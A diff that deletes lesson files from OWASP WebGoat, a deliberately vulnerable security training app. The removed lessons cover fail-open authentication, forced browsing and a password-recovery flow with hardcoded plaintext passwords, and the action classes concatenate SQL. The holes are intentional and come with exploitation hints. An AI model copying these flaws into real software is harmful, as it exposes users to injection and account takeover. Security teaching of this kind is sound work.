- return (cbuf.toString());
- } catch (Exception e)
- {
- return ("Encoding problem");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String unicodeEncode(String str)
- {
- // FIXME: TOTALLY EXPERIMENTAL
- try
- {
- Charset charset = Charset.forName("ISO-8859-1");
- CharsetEncoder encoder = charset.newEncoder();
- ByteBuffer bbuf = encoder.encode(CharBuffer.wrap(str));
- return (new String(bbuf.array()));
- } catch (Exception e)
- {
- return ("Encoding problem");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String urlDecode(String str)
- {
- try
- {
- return (URLDecoder.decode(str, "UTF-8"));
- } catch (Exception e)
- {
- return ("Decoding error");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String urlEncode(String str)
- {
- try
- {
- return (URLEncoder.encode(str, "UTF-8"));
- } catch (Exception e)
- {
- return ("Encoding error");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized char[] xor(String input, String userKey)
- {
- if ((userKey == null) || (userKey.trim().length() == 0))
- {
- userKey = "Goober";
- }
- char[] xorChars = userKey.toCharArray();
- int keyLen = xorChars.length;
- char[] inputChars = null;
- char[] outputChars = null;
- if (input != null)
- {
- inputChars = input.toCharArray();
- outputChars = new char[inputChars.length];
- for (int i = 0; i < 
inputChars.length; i++)
- {
- outputChars[i] = (char) (inputChars[i] ^ xorChars[i % keyLen]);
- }
- }
- return outputChars;
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String xorDecode(String input, String userKey)
- {
- try
- {
- String decoded = base64Decode(input);
- return new String(xor(decoded, userKey));
- } catch (Exception e)
- {
- return "String not XOR encoded.";
- }
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String xorEncode(String input, String userKey)
- {
- return base64Encode(xor(input, userKey));
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java b/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java
deleted file mode 100644
index d464d9646..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java
+++ /dev/null
@@ -1,185 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.html.A; -import org.apache.ecs.html.IMG; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
- */
-public class FailOpenAuthentication extends WeakAuthenticationCookie
-{
-
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
-
- if (logout)
- {
- s.setMessage("Goodbye!");
- s.eatCookies();
-
- return (makeLogin(s));
- }
-
- try
- {
- String username = "";
- String password = "";
-
- try
- {
- username = s.getParser().getRawParameter(USERNAME);
- password = s.getParser().getRawParameter(PASSWORD);
-
- // if credentials are bad, send the login page
- if (!"webgoat".equals(username) || !password.equals("webgoat"))
- {
- s.setMessage("Invalid username and password entered.");
-
- return (makeLogin(s));
- }
- } catch (Exception e)
- {
- // The parameter was omitted. set fail open status complete
- if (username.length() > 0 && e.getMessage().indexOf("not found") != -1)
- {
- if ((username != null) && (username.length() > 0))
- {
- makeSuccess(s);
- return (makeUser(s, username, "Fail Open Error Handling"));
- }
- }
- }
-
- // Don't let the fail open pass with a blank password.
- if (password.length() == 0)
- {
- // We make sure the username was submitted to avoid telling the user an invalid
- // username/password was entered when they first enter the lesson via the side menu.
- // This also suppresses the error if they just hit the login and both fields are
- // empty. 
- if (username.length() != 0)
- {
- s.setMessage("Invalid username and password entered.");
- }
-
- return (makeLogin(s));
-
- }
-
- // otherwise authentication is good, show the content
- if ((username != null) && (username.length() > 0)) { return (makeUser(s, username,
- "Parameters. You did not exploit the fail open.")); }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (makeLogin(s));
- }
-
- /**
- * Gets the category attribute of the FailOpenAuthentication object
- *
- * @return The category value
- */
- public Category getDefaultCategory()
- {
- return Category.ERROR_HANDLING;
- }
-
- /**
- * Gets the hints attribute of the AuthenticateScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("You can force errors during the authentication process.");
- hints.add("You can change length, existance, or values of authentication parameters.");
- hints
- .add("Try removing a parameter ENTIRELY with OWASP ZAP.");
-
- return hints;
- }
-
- /**
- * Gets the instructions attribute of the FailOpenAuthentication object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
- return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
- + "as the 'webgoat' user without entering a password. Try to login as the webgoat user without "
- + "specifying a password.";
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(20);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the AuthenticateScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Fail Open Authentication Scheme");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java b/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java
deleted file mode 100644
index ee05d1aa5..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java
+++ /dev/null
@@ -1,150 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created November 02, 2006
- */
-public class ForcedBrowsing extends LessonAdapter
-{
-
- private final static String SUCCEEDED = "succeeded";
-
- public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String success = new String(s.getParser().getStringParameter(SUCCEEDED, ""));
-
- if (success.length() != 0 && success.equals("yes"))
- {
- ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
- ec.addElement(new BR());
- Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-
- TR tr = new TR();
- tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
-
- Input input1 = new Input(Input.TEXT, "", "");
- tr.addElement(new TD(input1));
- t1.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD(new StringElement("Set Admin Password:")));
-
- input1 = new Input(Input.PASSWORD, "", "");
- tr.addElement(new TD(input1));
- t1.addElement(tr);
-
- Element b = ECSFactory.makeButton("Submit");
- t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
- ec.addElement(t1);
-
- makeSuccess(s);
- }
- else
- {
- ec
- .addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
- }
- return ec;
- }
-
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.INSECURE_CONFIGURATION;
- }
-
- /**
- * 
Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Try to guess the URL for the config page");
- hints.add("The config page is guessable and hackable");
- hints.add("Play with the URL and try to guess what you can replace 'attack' with.");
- hints.add("Try to navigate to http://localhost/WebGoat/conf");
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(15);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Forced Browsing");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java b/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java
deleted file mode 100644
index 358a501e6..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java
+++ /dev/null
@@ -1,335 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import java.util.HashMap; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.B; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TH; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Eric Sheridan Aspect Security - * @created December 18, 2005 - */ -public class ForgotPassword extends LessonAdapter -{ - - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - private final static String USERNAME = "Username"; - - private static String USERNAME_RESPONSE = ""; - - private final static String COLOR = "Color"; - - private static String COLOR_RESPONSE = ""; - - private static int STAGE = 1; - - private final static HashMap USERS = new HashMap(); - - private final static HashMap COLORS = new HashMap(); - - private void populateTables() - { - USERS.put("admin", "2275$starBo0rn3"); - USERS.put("jeff", "(_I_)illia(V)s"); - USERS.put("dave", "\\V/ich3r$"); - USERS.put("intern", "H3yn0w"); - USERS.put("webgoat", "webgoat"); - - COLORS.put("admin", "green"); - COLORS.put("jeff", "orange"); - COLORS.put("dave", "purple"); - COLORS.put("intern", "yellow"); - COLORS.put("webgoat", "red"); - } - - protected Element doStage1(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery "))); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH() - .addElement("Please input your username. 
See the OWASP admin if you do not have an account.") - .setColSpan(2).setAlign("left")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - - TR row1 = new TR(); - row1.addElement(new TD(new B(new StringElement("*User Name: ")))); - - Input input1 = new Input(Input.TEXT, USERNAME, ""); - row1.addElement(new TD(input1)); - t.addElement(row1); - - Element b = ECSFactory.makeButton("Submit"); - t.addElement(new TR(new TD(b))); - ec.addElement(t); - - return (ec); - } - - protected Element doStage2(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new H1().addElement("Webgoat Password Recovery ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2) - .setAlign("left")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - - TR row1 = new TR(); - row1.addElement(new TD(new B(new StringElement("*Answer: ")))); - - Input input1 = new Input(Input.TEXT, COLOR, ""); - row1.addElement(new TD(input1)); - t.addElement(row1); - - Element b = ECSFactory.makeButton("Submit"); - t.addElement(new TR(new TD(b))); - ec.addElement(t); - - return (ec); - } - - protected Element doStage3(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new H1().addElement("Webgoat Password Recovery ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR 
tr = new TR(); - tr.addElement(new TH().addElement("For security reasons, please change your password immediately.") - .setColSpan(2).setAlign("left")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:")))) - .setAlign("left")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE))); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE))); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(new StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString()))); - t.addElement(tr); - - ec.addElement(t); - - if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green")) - { - makeSuccess(s); - } - else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE)) - { - s.setMessage("Close. Now try to get the password of a privileged account."); - } - return ec; - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String username = ""; - String color = ""; - - color = s.getParser().getStringParameter(COLOR, ""); - - if (color.length() > 0) - STAGE = 2; - else - STAGE = 1; - - if (USERS.size() == 0) - { - populateTables(); - } - - if (STAGE == 2) - { - color = s.getParser().getStringParameter(COLOR, ""); - - if (COLORS.get(USERNAME_RESPONSE).equals(color)) - { - STAGE = 1; - COLOR_RESPONSE = color; - ec.addElement(doStage3(s)); - } - else - { - s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". 
Please try again!"); - ec.addElement(doStage2(s)); - } - } - else if (STAGE == 1) - { - username = s.getParser().getStringParameter(USERNAME, ""); - - if (USERS.containsKey(username)) - { - STAGE = 2; - USERNAME_RESPONSE = username; - ec.addElement(doStage2(s)); - } - else - { - if (username.length() > 0) - { - s.setMessage("Not a valid username. Please try again."); - } - ec.addElement(doStage1(s)); - } - } - else - { - ec.addElement(doStage1(s)); - STAGE = 1; - } - - return ec; - } - - /** - * Gets the category attribute of the ForgotPassword object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - - return Category.AUTHENTICATION; - } - - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add("There is no lock out policy in place, brute force your way!"); - hints.add("Try using usernames you might encounter throughout WebGoat."); - hints.add("There are only so many possible colors, can you guess one?"); - hints.add("The administrative account is \"admin\""); - - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(15); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Forgot Password"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java deleted file mode 100644 index d0df80232..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java +++ /dev/null 
@@ -1,330 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.PreparedStatement; -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. - * - * For details, please see http://webgoat.github.io - */ -public abstract class DefaultLessonAction implements LessonAction -{ - // FIXME: We could parse this class name to get defaults for these fields. 
- private String lessonName; - private String actionName; - - private GoatHillsFinancial lesson; - - public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName) - { - this.lesson = lesson; - this.lessonName = lessonName; - this.actionName = actionName; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException, ValidationException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) - { - } - else - throw new UnauthenticatedException(); - } - - public abstract String getNextPage(WebSession s); - - public GoatHillsFinancial getLesson() - { - return lesson; - } - - public String getLessonName() - { - return lessonName; - } - - public String getActionName() - { - return actionName; - } - - public void setSessionAttribute(WebSession s, String name, Object value) - { - s.getRequest().getSession().setAttribute(name, value); - } - - public void setRequestAttribute(WebSession s, String name, Object value) - { - s.getRequest().setAttribute(name, value); - } - - public void removeSessionAttribute(WebSession s, String name) - { - s.getRequest().getSession().removeAttribute(name); - } - - protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException - { - String value = (String) s.getRequest().getSession().getAttribute(name); - if (value == null) { throw new ParameterNotFoundException(); } - - return value; - } - - protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException - { - boolean value = false; - - Object attribute = s.getRequest().getSession().getAttribute(name); - if (attribute == null) - { - throw new ParameterNotFoundException(); - } - else - { - // System.out.println("Attribute " + name + " is of type " + - // s.getRequest().getSession().getAttribute(name).getClass().getName()); - // System.out.println("Attribute value: " + - // 
s.getRequest().getSession().getAttribute(name)); - value = ((Boolean) attribute).booleanValue(); - } - return value; - } - - protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException - { - int value = -1; - String ss = (String) s.getRequest().getSession().getAttribute(name); - if (ss == null) - { - throw new ParameterNotFoundException(); - } - else - { - try - { - value = Integer.parseInt(ss); - } catch (NumberFormatException nfe) - { - } - } - - return value; - } - - protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException - { - String value = (String) s.getRequest().getAttribute(name); - if (value == null) { throw new ParameterNotFoundException(); } - - return value; - } - - protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException - { - int value = -1; - String ss = (String) s.getRequest().getAttribute(name); - if (ss == null) - { - throw new ParameterNotFoundException(); - } - else - { - try - { - value = Integer.parseInt(ss); - } catch (NumberFormatException nfe) - { - } - } - - return value; - } - - public int getUserId(WebSession s) throws ParameterNotFoundException - { - return getIntSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID); - } - - public String getUserName(WebSession s) throws ParameterNotFoundException - { - String name = null; - - int employeeId = getUserId(s); - try - { - String query = "SELECT first_name FROM employee WHERE userid = " + employeeId; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) name = answer_results.getString("first_name"); - } catch (SQLException sqle) - { - s.setMessage("Error getting user name"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error getting user name"); - e.printStackTrace(); - } - - return name; - } - - public boolean requiresAuthentication() - { - // Default to true - return true; - } - - public boolean isAuthenticated(WebSession s) - { - boolean authenticated = false; - - try - { - authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated"); - } catch (ParameterNotFoundException e) - { - } - - return authenticated; - } - - public boolean isAuthorized(WebSession s, int employeeId, String functionId) - { - String employer_id = (String) s.getRequest().getSession() - .getAttribute(getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID); - // System.out.println("Authorizing " + employeeId + " for use of function: " + functionId + - // " having USER_ID = " - // + employer_id ); - boolean authorized = false; - - try - { - String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " - + employeeId + ") and functionid = '" + functionId + "'"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - authorized = answer_results.first(); - - /* - * User is validated for function, but can the user perform that function on the - * specified user? - */ - if (authorized) - { - authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId); - } - } catch (SQLException sqle) - { - s.setMessage("Error authorizing"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error authorizing"); - e.printStackTrace(); - } - - // System.out.println("Authorized? " + authorized); - return authorized; - } - - public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId) - { - // System.out.println("Authorizing " + userId + " for access to employee: " + employeeId); - boolean authorized = false; - - try - { - String query = "SELECT * FROM ownership WHERE employer_id = ? 
AND employee_id = ?"; - - try - { - - PreparedStatement answer_statement = WebSession.getConnection(s) - .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, userId); - answer_statement.setInt(2, employeeId); - ResultSet answer_results = answer_statement.executeQuery(); - authorized = answer_results.first(); - } catch (SQLException sqle) - { - s.setMessage("Error authorizing"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error authorizing"); - e.printStackTrace(); - } - - return authorized; - } - - protected void setStage(WebSession s, String stage) - { - getLesson().setStage(s, stage); - } - - protected void setStageComplete(WebSession s, String stage) - { - getLesson().setStageComplete(s, stage); - } - - protected String getStage(WebSession s) - { - return getLesson().getStage(s); - } - - public String toString() - { - return getActionName(); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java deleted file mode 100644 index f4c977670..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java +++ /dev/null 
@@ -1,111 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class DeleteProfile extends DefaultLessonAction -{ - - private LessonAction chainedAction; - - public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException, ValidationException - { - getLesson().setCurrentAction(s, getActionName()); - - int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); - - if (isAuthenticated(s)) - { - deleteEmployeeProfile(s, userId, employeeId); - - try - { - chainedAction.handleRequest(s); - } catch (UnauthenticatedException ue1) - { - // System.out.println("Internal server error"); - ue1.printStackTrace(); - } catch (UnauthorizedException ue2) - { - // System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - throw new UnauthenticatedException(); - - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.LISTSTAFF_ACTION; - } - - public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException - { - try - { - // Note: The password field is ONLY set by ChangePassword - String query = "DELETE FROM employee WHERE userid = " + employeeId; - // System.out.println("Query: " + query); - try - { - Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - statement.executeUpdate(query); - } catch (SQLException sqle) - { - s.setMessage("Error deleting employee profile"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error deleting employee profile"); - e.printStackTrace(); - } - } - -} 
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java deleted file mode 100644 index 69909bb06..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java +++ /dev/null 
